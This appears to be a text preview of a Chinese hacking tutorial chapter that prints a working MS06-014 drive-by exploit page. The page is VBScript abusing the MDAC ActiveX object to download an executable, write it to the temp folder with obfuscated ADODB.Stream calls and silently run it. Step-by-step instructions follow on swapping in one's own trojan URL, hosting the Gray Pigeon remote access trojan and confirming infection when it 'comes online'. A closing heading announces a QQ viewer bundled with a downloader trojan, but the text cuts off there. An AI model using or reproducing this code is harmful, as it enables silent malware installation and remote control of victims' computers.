第九章 实例.pdf
文本预览下载声明
第九章 两个实例
在最后一章里,将介绍两个实例,这两个例子都很简单,在第二个
“QQ 信息查询器”这个例子中,用户只要用一点 microsoft visual
basic 编程基础即可完成这个程序.
9.1 ms06-014 网马
微软安全公告号:ms06-014
发布时间:2006-4-11
漏洞述描:Microsoft Data Access Components(MDAC)功能中的漏洞充许远程代码执行
此漏洞补丁下载:/china/technet/security/bulletin/MS06-014.mspx
受影响的操作系统版本和 office 版本:
Windwso xp , ie6.0 ,access2003
这个漏洞公布的时间已经很长了, 由于受影响的IE 6.0 几乎没有人用了,并且这个针
对这个漏洞的攻击代码在网上也可以找到,因此我想我可以打破”沉默”,公布其漏洞的攻击代
码,代码如下:
html
head
script language=VBScript
on error resume next
download = /server_setup.exe
Set dE = document.createElement(object)
dE.setAttribute classid, clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
str=Microsoft.XMLHTTP
Set str = dE.CreateObject(str,)
str1=Ado
str2=db.
str3=Str
str4=eam
str5=str1str2str3str4
str6=str5
set S = dE.createobject(str6,)
S.type = 1
str7=GET
str.Open str7, download, False
str.Send
filename=Nonsenser.Com
set Fso = dE.createobject(Scripting.FileSystemObject,)
set tmp = Fso.GetSpecialFolder(2)
filename= Fso.BuildPath(tmp,filename)
S.open
S.write str.responseBody
S.savetofile filename,2
S.close
set Exe = dE.createobject(Shell.Application,)
Exe.ShellExecute filename,,,open,0
/script
titletest ms06-014/title
/head
body
center这是一个测试 ms06-014 的页面,此漏洞发布时间 2006-4-11/center
/body
/html
测试方法如下:
1. 这个漏洞只存在于IE 6.0,为了保证测试顺利,确保系经使用的是IE 6.0,并且系统安装
了office,还有最重要的是这个漏洞还没有打补丁.
2.修改第5行代码,把/server_setup.exe修改成你自已的木马地址
3.上传一个木马到空间,本例以灰鸽子(server_setup.exe)为例.
4.把以上代码保存为 “ms06-014.htm”并且上传到空间.
5.在本地浏览器中输入网马的地址.
6.如果灰鸽子上线了则说明测试成功.
9.2 QQ 信息查看器+下载者木马
9.2 QQ 信息查看器+下载者木马
程序名称:
显示全部